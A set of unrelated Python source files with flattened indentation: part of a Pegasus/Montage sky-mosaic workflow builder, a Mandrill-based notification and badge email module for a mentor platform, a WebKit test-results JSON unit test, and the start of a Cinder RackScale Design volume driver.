replica_catalog[projected_tbl.name] = \
{"url": "file://" + os.getcwd() + "/data/" + projected_tbl.name, "site_label": "local"}
corrected_tbl = File("%s-corrected.tbl" %(band_id))
replica_catalog[corrected_tbl.name] = \
{"url": "file://" + os.getcwd() + "/data/" + corrected_tbl.name, "site_label": "local"}
cmd = "cd data && mDAGTbls %s-images.tbl region-oversized.hdr %s %s %s" \
%(band_id, raw_tbl.name, projected_tbl.name, corrected_tbl.name)
print "Running sub command: " + cmd
if subprocess.call(cmd, shell=True) != 0:
print "Command failed!"
sys.exit(1)
# diff table
cmd = "cd data && mOverlaps %s-raw.tbl %s-diffs.tbl" \
%(band_id, band_id)
print "Running sub command: " + cmd
if subprocess.call(cmd, shell=True) != 0:
print "Command failed!"
sys.exit(1)
# statfile table
t = ascii.read("data/%s-diffs.tbl" %(band_id))
# make sure we have a wide enough column
t['stat'] = " "
for row in t:
base_name = re.sub("(diff\.|\.fits.*)", "", row['diff'])
row['stat'] = "%s-fit.%s.txt" %(band_id, base_name)
ascii.write(t, "data/%s-stat.tbl" %(band_id), format='ipac')
replica_catalog["%s-stat.tbl" %(band_id)] = \
{"url": "file://" + os.getcwd() + "/data/%s-stat.tbl" %(band_id), \
"site_label": "local"}
# for all the input images in this band, add them to the rc, and
# add reproject tasks
data = ascii.read("data/%s-images.tbl" %(band_id))
for row in data:
base_name = re.sub("\.fits.*", "", row['file'])
# add an entry to the replica catalog
replica_catalog[base_name + ".fits"] = {"url": row['URL'], "site_label": "ipac"}
# projection job
j = Job(name="mProject")
in_fits = File(base_name + ".fits")
projected_fits = File("p" + base_name + ".fits")
area_fits = File("p" + base_name + "_area.fits")
j.uses(common_files["region-oversized.hdr"], link=Link.INPUT)
j.uses(in_fits, link=Link.INPUT)
j.uses(projected_fits, link=Link.OUTPUT, transfer=False)
j.uses(area_fits, link=Link.OUTPUT, transfer=False)
j.addArguments("-X", in_fits, projected_fits, common_files["region-oversized.hdr"])
dax.addJob(j)
fit_txts = []
data = ascii.read("data/%s-diffs.tbl" %(band_id))
for row in data:
base_name = re.sub("(diff\.|\.fits.*)", "", row['diff'])
# mDiffFit job
j = Job(name="mDiffFit")
plus = File("p" + row['plus'])
plus_area = File(re.sub("\.fits", "_area.fits", plus.name))
minus = File("p" + row['minus'])
minus_area = File(re.sub("\.fits", "_area.fits", minus.name))
fit_txt = File("%s-fit.%s.txt" %(band_id, base_name))
diff_fits = File("%s-diff.%s.fits" %(band_id, base_name))
j.uses(plus, link=Link.INPUT)
j.uses(plus_area, link=Link.INPUT)
j.uses(minus, link=Link.INPUT)
j.uses(minus_area, link=Link.INPUT)
j.uses(common_files["region-oversized.hdr"], link=Link.INPUT)
j.uses(fit_txt, link=Link.OUTPUT, transfer=False)
#j.uses(diff_fits, link=Link.OUTPUT, transfer=True)
j.addArguments("-d", "-s", fit_txt, plus, minus, diff_fits, common_files["region-oversized.hdr"])
dax.addJob(j)
fit_txts.append(fit_txt)
# mConcatFit
j = Job(name="mConcatFit")
stat_tbl = File("%s-stat.tbl" %(band_id))
j.uses(stat_tbl, link=Link.INPUT)
j.addArguments(stat_tbl)
fits_tbl = File("%s-fits.tbl" %(band_id))
j.uses(fits_tbl, link=Link.OUTPUT, transfer=False)
j.addArguments(fits_tbl)
for fit_txt in fit_txts:
j.uses(fit_txt, link=Link.INPUT)
j.addArguments(".")
dax.addJob(j)
# mBgModel
j = Job(name="mBgModel")
j.addArguments("-i", "100000")
images_tbl = File("%s-images.tbl" %(band_id))
j.uses(images_tbl, link=Link.INPUT)
j.addArguments(images_tbl)
j.uses(fits_tbl, link=Link.INPUT)
j.addArguments(fits_tbl)
corrections_tbl = File("%s-corrections.tbl" %(band_id))
j.uses(corrections_tbl, link=Link.OUTPUT, transfer=False)
j.addArguments(corrections_tbl)
dax.addJob(j)
# mBackground
data = ascii.read("data/%s-raw.tbl" %(band_id))
for row in data:
base_name = re.sub("(diff\.|\.fits.*)", "", row['file'])
# mBackground job
j = Job(name="mBackground")
projected_fits = File("p" + base_name + ".fits")
projected_area = File("p" + base_name + "_area.fits")
corrected_fits = File("c" + base_name + ".fits")
corrected_area = File("c" + base_name + "_area.fits")
j.uses(projected_fits, link=Link.INPUT)
j.uses(projected_area, link=Link.INPUT)
j.uses(projected_tbl, link=Link.INPUT)
j.uses(corrections_tbl, link=Link.INPUT)
j.uses(corrected_fits, link=Link.OUTPUT, transfer=False)
j.uses(corrected_area, link=Link.OUTPUT, transfer=False)
j.addArguments("-t", projected_fits, corrected_fits, projected_tbl, corrections_tbl)
dax.addJob(j)
# mImgtbl - we need an updated corrected images table because the pixel offsets and sizes need
# to be exactly right and the original is only an approximation
j = Job(name="mImgtbl")
updated_corrected_tbl = File("%s-updated-corrected.tbl" %(band_id))
j.uses(corrected_tbl, link=Link.INPUT)
j.uses(updated_corrected_tbl, link=Link.OUTPUT, transfer=False)
j.addArguments(".", "-t", corrected_tbl, updated_corrected_tbl)
data = ascii.read("data/%s-corrected.tbl" %(band_id))
for row in data:
base_name = re.sub("(diff\.|\.fits.*)", "", row['file'])
projected_fits = File(base_name + ".fits")
j.uses(projected_fits, link=Link.INPUT)
dax.addJob(j)
# mAdd
j = Job(name="mAdd")
mosaic_fits = File("%s-mosaic.fits" %(band_id))
mosaic_area = File("%s-mosaic_area.fits" %(band_id))
j.uses(updated_corrected_tbl, link=Link.INPUT)
j.uses(common_files["region.hdr"], link=Link.INPUT)
j.uses(mosaic_fits, link=Link.OUTPUT, transfer=True)
j.uses(mosaic_area, link=Link.OUTPUT, transfer=True)
j.addArguments("-e", updated_corrected_tbl, common_files["region.hdr"], mosaic_fits)
data = ascii.read("data/%s-corrected.tbl" %(band_id))
for row in data:
base_name = re.sub("(diff\.|\.fits.*)", "", row['file'])
corrected_fits = File(base_name + ".fits")
corrected_area = File(base_name + "_area.fits")
j.uses(corrected_fits, link=Link.INPUT)
j.uses(corrected_area, link=Link.INPUT)
dax.addJob(j)
# mViewer - Make the JPEG for this channel
j = Job(name="mViewer")
mosaic_jpg = File("%s-mosaic.jpg" %(band_id))
j.uses(mosaic_fits, link=Link.INPUT)
j.uses(mosaic_jpg, link=Link.OUTPUT, transfer=True)
j.addArguments("-ct", "0", "-gray", mosaic_fits, "0s", "99.999%", "gaussian", \
"-out", mosaic_jpg)
dax.addJob(j)
def color_jpg(dax, red_id, green_id, blue_id):
global replica_catalog
red_id = str(red_id)
green_id = str(green_id)
blue_id = str(blue_id)
# mViewer - Make the JPEG for this channel
j = Job(name="mViewer")
mosaic_jpg = File("mosaic-color.jpg")
red_fits = File("%s-mosaic.fits" %(red_id))
green_fits = File("%s-mosaic.fits" %(green_id))
blue_fits = File("%s-mosaic.fits" %(blue_id))
j.uses(red_fits, link=Link.INPUT)
j.uses(green_fits, link=Link.INPUT)
j.uses(blue_fits, link=Link.INPUT)
j.uses(mosaic_jpg, link=Link.OUTPUT, transfer=True)
j.addArguments( \
"-red", red_fits, "-1s", "99.999%", "gaussian-log", \
"-green", green_fits, "-1s", "99.999%", "gaussian-log", \
"-blue", blue_fits, "-1s", "99.999%", "gaussian-log", \
"-out", mosaic_jpg)
dax.addJob(j)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--work-dir", action = "store", dest = "work_dir",
help = "Work directory to chdir to")
parser.add_argument("--center", action = "store", dest = "center",
help = "Center of the output, for example M17 or 56.5 23.75")
parser.add_argument("--degrees", action = "store", dest = "degrees",
help = "Number of degrees of side of the output")
parser.add_argument("--band", action = "append", dest = "bands",
help = "Band definition. Example: dss:DSS2B:red")
parser.add_argument("--tc-target", action = "store", dest = "tc_target",
help = "Transformation catalog: regular or container")
args = parser.parse_args()
if args.work_dir:
os.chdir(args.work_dir)
if args.tc_target is None:
args.tc_target = "regular"
if os.path.exists("data"):
print("data/ directory already exists")
sys.exit(1)
os.mkdir("data")
dax = AutoADAG("montage")
# email notifications for when the state of the workflow changes
share_dir = subprocess.Popen("pegasus-config --sh-dump | grep ^PEGASUS_SHARE_DIR= | sed -e 's/.*=//' -e 's/\"//g'",
shell=True,
stdout=subprocess.PIPE).communicate()[0]
share_dir = share_dir.strip()
dax.invoke('start', share_dir + "/notification/email")
dax.invoke('on_error', share_dir + "/notification/email")
dax.invoke('on_success', share_dir + "/notification/email --report=pegasus-statistics")
build_transformation_catalog(args.tc_target, dax)
# region.hdr is the template for the output area
generate_region_hdr(dax, args.center, args.degrees)
band_id = 0
color_band = {}
for band_def in args.bands:
band_id += 1
(survey, band, color) = band_def.split(":")
add_band(dax, band_id, args.center, args.degrees, survey, band, color)
color_band[color] = band_id
# if we have 3 bands in red, blue, green, try to create a color jpeg
if 'red' in color_band and 'green' in color_band and 'blue' in color_band:
color_jpg(dax, color_band['red'], color_band['green'], color_band['blue'])
# write out the replica catalog
fd = open("data/rc.txt", "w")
for lfn, data in replica_catalog.items():
fd.write("%s \"%s\" pool=\"%s\"\n" %(lfn, data['url'], data['site_label']))
fd.close()
fd = open("data/montage.dax", "w")
dax.writeXML(fd)
fd.close()
if __name__ == "__main__":
main()
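# Hedged note (illustration only): the replica catalog written by main() uses
# the classic Pegasus text RC format, one logical file name per line, e.g.
#   region.hdr "file:///some/run/dir/data/region.hdr" pool="local"
# (the path here is hypothetical). One entry is formatted as:
def _example_rc_line(lfn, data):
    return '%s "%s" pool="%s"' % (lfn, data['url'], data['site_label'])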
|
|
from models import User, Message, Contribution, Program
from time import gmtime, strftime
import mandrill
import exceptions
import access
import mailContent
KEY = access.mandrill_key
# Sends an outbound mail, from an entrepreneur to a mentor or job applicant
def outBoundMail(message):
from_email = message.get("sender_email")
from_name = message.get("sender_name")
to_email = message.get("receiver_email")
to_name = message.get("receiver_name")
subject = message.get("subject")
html = message.get("content")
reply_to = message.get("reply_to")
tags = "Outbound Mail"
merge = False
variables = None
return sendOutboundMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables, merge)
def sendOutboundMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables, merge):
try:
mandrill_client = mandrill.Mandrill(KEY)
message = {'auto_html': True,
'auto_text': True,
'from_email': from_email,
'from_name': from_name,
'global_merge_vars': [{'content': 'merge1 content', 'name': 'merge1'}],
'headers': {'Reply-To': reply_to},
'html': html,
'important': True,
'inline_css': True,
'merge': merge,
'merge_vars': [{'rcpt': to_email, 'vars': variables}],
'metadata': {'website': 'www.mestmentorplatform.appspot.com'},
'preserve_recipients': None,
'recipient_metadata': [{'rcpt': to_email,
'values': {'rcpt_name': to_name}
}],
'signing_domain': None,
'subject': subject,
'tags': [tags],
'text': html,
'to': [{'email': to_email}],
'track_clicks': True,
'track_opens': True,
'tracking_domain': None,
'url_strip_qs': None}
result = mandrill_client.messages.send(message=message, async=False, ip_pool='Main Pool')
print(result[0].get("_id"))
return result
except mandrill.Error as e:
return 'A mandrill error occurred: %s - %s' % (e.__class__, e)
#outbound mail ends here
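# Hedged usage sketch (never called): outBoundMail above expects a dict
# carrying the keys it reads via message.get(); all addresses and names here
# are hypothetical:
def _example_outbound_message():
    return {
        "sender_email": "founder@example.com",
        "sender_name": "Jane Founder",
        "receiver_email": "mentor@example.com",
        "receiver_name": "John Mentor",
        "subject": "Quick question",
        "content": "<p>Hello!</p>",
        "reply_to": "founder@example.com",
    }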
def getAdminDetails():
recipient = {}
recipient['name'] = "Administration"
recipient['email'] = "nnutsukpui@gmail.com"
# recipient['alias'] = "<no-reply>@mestmentorplatform.appspotmail.com"
# <incubator.mgmt@meltwater.org>
# recipient['name'] = "Anirudh Narla"
# recipient['email'] = "anirudh@meltwater.org"
recipient['alias'] = "admin@mestmentorplatform.appspotmail.com"
return recipient
user_role = {"Entrepreneur": "an Entrepreneur", "Mentor": "a Mentor", "Job Applicant": "a Freelancer"}
def requestMail(user):
new_user_name = user.first_name + " " + user.last_name
new_user_role = user_role.get(user.user_profile)
from_email = "admin@mestmentorplatform.appspotmail.com"
from_name = "MEST Mentor Platform"
recipient = getAdminDetails()
to_email = recipient.get("email")
to_name = recipient.get("name")
subject = "Request For Confirmation"
html = mailContent.request
reply_to = recipient.get("alias")
tags = "Request For Confirmation"
confirmation_url = access.admin_url
variables = [{'name': 'username', 'content': new_user_name},
{'name': 'role', 'content': new_user_role },
{'name':'confirmation_url', 'content': confirmation_url}]
print(sendRequestMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables))
def sendRequestMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables):
try:
mandrill_client = mandrill.Mandrill(KEY)
message = {'auto_html': True,
'auto_text': True,
'from_email': from_email,
'from_name': from_name,
'global_merge_vars': [{'content': 'merge1 content', 'name': 'merge1'}],
'headers': {'Reply-To': reply_to},
'html': html,
'important': True,
'inline_css': True,
'merge': True,
'merge_vars': [{'rcpt': to_email, 'vars': variables}],
'metadata': {'website': 'www.mestmentorplatform.appspot.com'},
'preserve_recipients': None,
'recipient_metadata': [{'rcpt': to_email,
'values': {'user_id': 123456}}],
'signing_domain': None,
'subject': subject,
'tags': [tags],
'text': "text",
'to': [{'email': to_email}],
'track_clicks': True,
'track_opens': True,
'tracking_domain': None,
'url_strip_qs': None}
result = mandrill_client.messages.send(message=message, async=False, ip_pool='Main Pool')
return result
except mandrill.Error as e:
return 'A mandrill error occurred: %s - %s' % (e.__class__, e)
def composeNewMail(message):
user = message.get('sender')
notify = message.get('notification_email')
result = False
try:
result = outBoundMail(message)
except Exception:
return False
if result != False:
try:
msg = Message.create(message)
user.notify_mail = notify
user.put()
# print user.notify_mail
return result
except Exception:
return False
else:
return False
def notifyEntrepreneur(message):
user = message.get("receiver")
from_email = message.get("sender_email")
from_name = message.get("sender_name")
to_email = user.notify_mail
to_name = message.get("sender_name")
subject = "You just received a mail on the MEST Mentor Platform."
html = mailContent.notification_received
reply_to = "admin@mestmentorplatform.appspotmail.com"
tags = "Outbound Mail"
confirmation_url = access.message_url
variables = [ {'name': 'username', 'content': message.get("receiver").first_name + " " +message.get("receiver").last_name},
{'name': 'sender_name', 'content': message.get("sender").first_name + " " +message.get("sender").last_name},
{'name': 'role', 'content' : message.get("sender").user_profile },
{'name':'read_url', 'content': confirmation_url}]
merge = False
return sendOutboundMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables, merge)
def confirmUserMail(user):
from_email = "admin@mestmentorplatform.appspotmail.com"
from_name = "MEST Mentor Platform"
to_email = user.notify_mail
to_name = user.first_name + " " + user.last_name
subject = "Welcome to the MEST Mentor Platform!"
confirmation_url = access.signin_url
if user.user_profile == "Mentor":
html = mailContent.confirm_user_mentor
variables = [{ 'name': 'username', 'content': to_name},
{'name': 'server_url', 'content': access.server_url},
{'name': 'signin_url', 'content': confirmation_url},
{'name': 'confirmation_url', 'content': confirmation_url}]
elif user.user_profile == "Entrepreneur":
html = mailContent.confirm_user
variables = [{ 'name': 'username', 'content': to_name},
{'name': 'signin_url', 'content': confirmation_url},
{'name': 'confirmation_url', 'content': confirmation_url}]
reply_to = "admin@mestmentorplatform.appspotmail.com"
tags = "Confirmed User"
merge = False
return sendOutboundMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables, merge)
def notificationMail(user):
from_email = "admin@mestmentorplatform.appspotmail.com"
from_name = "MEST Mentor Platform"
to_email = user.notify_mail
to_name = user.first_name + " " + user.last_name
user_profile = ""
if user.user_profile == "Mentor":
user_profile = "a Mentor"
else:
user_profile = "an Entrepreneur"
subject = "We've Received Your %s Application" %(user.user_profile)
html = mailContent.signup_template
variables = [{ 'name': 'username', 'content': to_name},
{'name': 'userprofile', 'content': user_profile}]
reply_to = "admin@mestmentorplatform.appspotmail.com"
tags = "Confirmed User"
merge = False
return sendOutboundMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables, merge)
def sendContributionMails(contribution, mentor):
result = sendContributionMailAdmin(contribution, mentor)
def sendContributionMailAdmin(contribution, mentor):
admin = User.all().filter("user_profile =", "Administrator").get()
from_email = "admin@mestmentorplatform.appspotmail.com"
from_name = "MEST Mentor Platform"
to_email = "admin@mestmentorplatform.appspotmail.com"
to_name = admin.first_name + " " + admin.last_name
mentor_name = mentor.first_name + " " + mentor.last_name
subject = "%s has submitted hours for assisting %s" %(mentor_name, contribution.get("company",""))
html = mailContent.newhour
variables = [
{'name':'contributors_full_name', 'content': mentor_name},
{'name':'contributed_hours', 'content': contribution.get("hours","")},
{'name':'company_name', 'content': contribution.get("company","")},
{'name':'contributors_first_name', 'content': mentor.first_name},
{'name':'description', 'content': contribution.get("description","")}
]
reply_to = "admin@mestmentorplatform.appspotmail.com"
tags = "New hour contributed"
merge = False
ceo = getContributionCEO(contribution)
try:
# first = sendOutboundMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables, merge)
second = sendOutboundMail(from_email, from_name, admin.email, to_name, subject, html, tags, reply_to, variables, merge)
third = sendOutboundMail(from_email, from_name, ceo.get("to_email"), ceo.get("to_name"), subject, html, tags, reply_to, variables, merge)
fourth = sendBadgeMail(from_email, from_name, contribution, mentor, admin, reply_to, merge, to_name)
return True
except Exception:
return False
def getContributionCEO(contribution):
ceo = {}
ceo['to_email'] = "nnutsukpui@gmail.com"
ceo['to_name'] = "Nicodemus Nutsukpui"
return ceo
def sendBadgeMail(from_email, from_name, contribution, mentor, admin, reply_to, merge, to_name):
sendmail = False
contributed_hours = contribution.get("new_total")
badge_category = ""
badge_name = ""
contributors_first_name = mentor.first_name
program = Program.all().filter("user = ", mentor).get()
to_name_mentor = mentor.first_name + " " + mentor.last_name
subject = "%s just earned a new badge!" %(to_name_mentor)
tags = "New badge earned"
if contributed_hours >= 50 and program.guru is None:
sendmail = True
badge_category = "GURU"
badge_name = "Badge50"
program.guru = True
program.ninja = True
program.rock_star = True
program.put()
elif contributed_hours >= 25 and program.ninja is None:
sendmail = True
badge_name = "Badge25"
badge_category = "NINJA"
program.ninja = True
program.rock_star = True
program.put()
elif contributed_hours >= 10 and program.rock_star is None:
sendmail = True
badge_name = "Badge10"
badge_category = "ROCK STAR"
program.rock_star = True
program.put()
to_email_mentor = mentor.email
html_mentor = mailContent.newbadge
variables_mentor = [
{'name':'contributors_first_name', 'content': contributors_first_name},
{'name':'contributed_hours', 'content': contributed_hours},
{'name':'badge_name', 'content': badge_name},
{'name':'badge_category', 'content': badge_category}
]
to_email_admin = admin.email
to_name_admin = to_name
html_admin = mailContent.newbadgeadmin
variables_admin = [
{'name':'contributors_full_name', 'content': to_name_mentor},
{'name':'badge_category', 'content': badge_category},
{'name':'contributed_hours', 'content': contributed_hours},
{'name':'contributors_first_name', 'content': contributors_first_name}
]
if sendmail:
try:
mentor_mail = sendOutboundMail(from_email, from_name, to_email_mentor, to_name_mentor, subject, html_mentor, tags, reply_to, variables_mentor, merge)
admin_mail = sendOutboundMail(from_email, from_name, to_email_admin, to_name_admin, subject, html_admin, tags, reply_to, variables_admin, merge)
return True
except Exception:
return False
return True
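# Hedged summary (illustration only, ignoring the already-earned checks):
# sendBadgeMail awards at most one badge per call, based on the mentor's
# running total of contributed hours: >= 50 -> GURU, >= 25 -> NINJA,
# >= 10 -> ROCK STAR.
def _example_badge_for_hours(hours):
    if hours >= 50:
        return "GURU", "Badge50"
    elif hours >= 25:
        return "NINJA", "Badge25"
    elif hours >= 10:
        return "ROCK STAR", "Badge10"
    return None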
|
|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import json
import optparse
import random
from webkitpy.common.host_mock import MockHost
from webkitpy.layout_tests.layout_package import json_results_generator
from webkitpy.layout_tests.models import test_expectations
from webkitpy.layout_tests.port import test
from webkitpy.thirdparty.mock import Mock
class JSONGeneratorTest(unittest.TestCase):
def setUp(self):
self.builder_name = 'DUMMY_BUILDER_NAME'
self.build_name = 'DUMMY_BUILD_NAME'
self.build_number = 'DUMMY_BUILDER_NUMBER'
# For archived results.
self._json = None
self._num_runs = 0
self._tests_set = set([])
self._test_timings = {}
self._failed_count_map = {}
self._PASS_count = 0
self._DISABLED_count = 0
self._FLAKY_count = 0
self._FAILS_count = 0
self._fixable_count = 0
def test_strip_json_wrapper(self):
json = "['contents']"
self.assertEqual(json_results_generator.strip_json_wrapper(json_results_generator._JSON_PREFIX + json + json_results_generator._JSON_SUFFIX), json)
self.assertEqual(json_results_generator.strip_json_wrapper(json), json)
def _test_json_generation(self, passed_tests_list, failed_tests_list):
tests_set = set(passed_tests_list) | set(failed_tests_list)
DISABLED_tests = set([t for t in tests_set
if t.startswith('DISABLED_')])
FLAKY_tests = set([t for t in tests_set
if t.startswith('FLAKY_')])
FAILS_tests = set([t for t in tests_set
if t.startswith('FAILS_')])
PASS_tests = tests_set - (DISABLED_tests | FLAKY_tests | FAILS_tests)
failed_tests = set(failed_tests_list) - DISABLED_tests
failed_count_map = dict([(t, 1) for t in failed_tests])
test_timings = {}
i = 0
for test in tests_set:
test_timings[test] = float(self._num_runs * 100 + i)
i += 1
test_results_map = dict()
for test in tests_set:
test_results_map[test] = json_results_generator.TestResult(test,
failed=(test in failed_tests),
elapsed_time=test_timings[test])
host = MockHost()
port = Mock()
port._filesystem = host.filesystem
generator = json_results_generator.JSONResultsGeneratorBase(port,
self.builder_name, self.build_name, self.build_number,
'',
None, # don't fetch past json results archive
test_results_map)
failed_count_map = dict([(t, 1) for t in failed_tests])
# Test incremental json results
incremental_json = generator.get_json()
self._verify_json_results(
tests_set,
test_timings,
failed_count_map,
len(PASS_tests),
len(DISABLED_tests),
len(FLAKY_tests),
len(DISABLED_tests | failed_tests),
incremental_json,
1)
# We don't verify the results here, but at least we make sure the code runs without errors.
generator.generate_json_output()
generator.generate_times_ms_file()
def _verify_json_results(self, tests_set, test_timings, failed_count_map,
PASS_count, DISABLED_count, FLAKY_count,
fixable_count,
json, num_runs):
# Aliasing to a short name for better access to its constants.
JRG = json_results_generator.JSONResultsGeneratorBase
self.assertTrue(JRG.VERSION_KEY in json)
self.assertTrue(self.builder_name in json)
buildinfo = json[self.builder_name]
self.assertTrue(JRG.FIXABLE in buildinfo)
self.assertTrue(JRG.TESTS in buildinfo)
self.assertEqual(len(buildinfo[JRG.BUILD_NUMBERS]), num_runs)
self.assertEqual(buildinfo[JRG.BUILD_NUMBERS][0], self.build_number)
if tests_set or DISABLED_count:
fixable = {}
for fixable_items in buildinfo[JRG.FIXABLE]:
for (type, count) in fixable_items.iteritems():
if type in fixable:
fixable[type] = fixable[type] + count
else:
fixable[type] = count
if PASS_count:
self.assertEqual(fixable[JRG.PASS_RESULT], PASS_count)
else:
self.assertTrue(JRG.PASS_RESULT not in fixable or
fixable[JRG.PASS_RESULT] == 0)
if DISABLED_count:
self.assertEqual(fixable[JRG.SKIP_RESULT], DISABLED_count)
else:
self.assertTrue(JRG.SKIP_RESULT not in fixable or
fixable[JRG.SKIP_RESULT] == 0)
if FLAKY_count:
self.assertEqual(fixable[JRG.FLAKY_RESULT], FLAKY_count)
else:
self.assertTrue(JRG.FLAKY_RESULT not in fixable or
fixable[JRG.FLAKY_RESULT] == 0)
if failed_count_map:
tests = buildinfo[JRG.TESTS]
for test_name in failed_count_map.iterkeys():
test = self._find_test_in_trie(test_name, tests)
failed = 0
for result in test[JRG.RESULTS]:
if result[1] == JRG.FAIL_RESULT:
failed += result[0]
self.assertEqual(failed_count_map[test_name], failed)
timing_count = 0
for timings in test[JRG.TIMES]:
if timings[1] == test_timings[test_name]:
timing_count = timings[0]
self.assertEqual(1, timing_count)
if fixable_count:
self.assertEqual(sum(buildinfo[JRG.FIXABLE_COUNT]), fixable_count)
def _find_test_in_trie(self, path, trie):
nodes = path.split("/")
sub_trie = trie
for node in nodes:
self.assertTrue(node in sub_trie)
sub_trie = sub_trie[node]
return sub_trie
def test_json_generation(self):
self._test_json_generation([], [])
self._test_json_generation(['A1', 'B1'], [])
self._test_json_generation([], ['FAILS_A2', 'FAILS_B2'])
self._test_json_generation(['DISABLED_A3', 'DISABLED_B3'], [])
self._test_json_generation(['A4'], ['B4', 'FAILS_C4'])
self._test_json_generation(['DISABLED_C5', 'DISABLED_D5'], ['A5', 'B5'])
self._test_json_generation(
['A6', 'B6', 'FAILS_C6', 'DISABLED_E6', 'DISABLED_F6'],
['FAILS_D6'])
# Generate JSON with the same test sets. (Both incremental results and
# archived results must be updated appropriately.)
self._test_json_generation(
['A', 'FLAKY_B', 'DISABLED_C'],
['FAILS_D', 'FLAKY_E'])
self._test_json_generation(
['A', 'DISABLED_C', 'FLAKY_E'],
['FLAKY_B', 'FAILS_D'])
self._test_json_generation(
['FLAKY_B', 'DISABLED_C', 'FAILS_D'],
['A', 'FLAKY_E'])
def test_hierarchical_json_generation(self):
# FIXME: Re-work tests to be more comprehensible and comprehensive.
self._test_json_generation(['foo/A'], ['foo/B', 'bar/C'])
def test_test_timings_trie(self):
test_port = test.TestPort(MockHost())
individual_test_timings = []
individual_test_timings.append(json_results_generator.TestResult('foo/bar/baz.html', elapsed_time=1.2))
individual_test_timings.append(json_results_generator.TestResult('bar.html', elapsed_time=0.0001))
trie = json_results_generator.test_timings_trie(test_port, individual_test_timings)
expected_trie = {
'bar.html': 0,
'foo': {
'bar': {
'baz.html': 1200,
}
}
}
self.assertEqual(json.dumps(trie), json.dumps(expected_trie))
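# A hedged sketch (not part of the test suite): the results JSON stores tests
# as a trie keyed by path components, which is what _find_test_in_trie above
# walks. For example, _example_trie_walk("foo/bar/baz.html",
# {"foo": {"bar": {"baz.html": 1200}}}) returns 1200.
def _example_trie_walk(path, trie):
    node = trie
    for part in path.split("/"):
        node = node[part]  # a KeyError here means the test is missing
    return node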
if __name__ == '__main__':
unittest.main()
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Driver for RackScale Design."""
from distutils import version
import json
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import units
try:
from rsd_lib import RSDLib
from sushy import exceptions as sushy_exceptions
except ImportError:
# Used for tests, when no rsd-lib is installed
RSDLib = None
sushy_exceptions = None
from cinder import exception
from cinder.i18n import _
from cinder import interface
from cinder import utils
from cinder.volume import driver
from cinder.volume import volume_utils
LOG = logging.getLogger(__name__)
RSD_OPTS = [
cfg.StrOpt('podm_url',
default='',
help='URL of PODM service'),
cfg.StrOpt('podm_username',
default='',
help='Username of PODM service'),
cfg.StrOpt('podm_password',
default='',
help='Password of PODM service',
secret=True),
]
class RSDRetryableException(exception.VolumeDriverException):
message = _("RSD retryable exception: %(reason)s")
def get_volume_metadata(volume):
metadata = volume.get('volume_metadata')
if metadata:
ret = {data['key']: data['value'] for data in metadata}
else:
ret = volume.get('metadata', {})
return ret
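# Hedged illustration (never called by the driver): get_volume_metadata
# normalizes the two shapes a volume's metadata may take; both of the
# hypothetical inputs below normalize to {'k': 'v'}.
def _example_metadata_shapes():
    list_form = {'volume_metadata': [{'key': 'k', 'value': 'v'}]}
    dict_form = {'metadata': {'k': 'v'}}
    return get_volume_metadata(list_form), get_volume_metadata(dict_form)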
class RSDClient(object):
def __init__(self, rsdlib):
self.rsdlib = rsdlib
@classmethod
def initialize(cls, url, username, password, verify):
if not RSDLib:
raise exception.VolumeBackendAPIException(
data=(_("RSDLib is not available, please install rsd-lib.")))
try:
rsdlib = RSDLib(url, username, password, verify=verify).factory()
except Exception:
# invalid credentials may raise an unexpected exception
LOG.exception("Cannot connect to RSD PODM")
raise exception.VolumeBackendAPIException(
data=_("initialize: Cannot connect to RSD PODM."))
rsd_api_version = version.LooseVersion(rsdlib._rsd_api_version)
if rsd_api_version < version.LooseVersion("2.4.0"):
raise exception.VolumeBackendAPIException(
data=(_("initialize: Unsupported rsd_api version: "
"%(current)s < %(expected)s.")
% {'current': rsdlib._rsd_api_version,
'expected': "2.4.0"}))
if rsdlib._redfish_version < version.LooseVersion("1.1.0"):
raise exception.VolumeBackendAPIException(
data=(_("initialize: Unsupported rsd_lib version: "
"%(current)s < %(expected)s.")
% {'current': rsdlib._redfish_version,
'expected': "1.1.0"}))
LOG.info("initialize: Connected to %s at version %s.",
url, rsdlib._rsd_api_version)
